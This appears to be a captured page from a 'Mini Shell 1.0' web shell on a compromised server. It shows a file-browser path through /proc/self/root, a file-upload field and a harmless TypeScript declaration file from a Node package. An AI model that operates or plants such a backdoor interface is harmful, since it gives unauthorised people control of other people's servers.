HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /proc/self/root/usr/share/node_modules/@nodelib/fs.walk/out/readers/
Upload File :
Current File : //proc/self/root/usr/share/node_modules/@nodelib/fs.walk/out/readers/reader.d.ts
import type Settings from '../settings';
export default class Reader {
    protected readonly _root: string;
    protected readonly _settings: Settings;
    constructor(_root: string, _settings: Settings);
}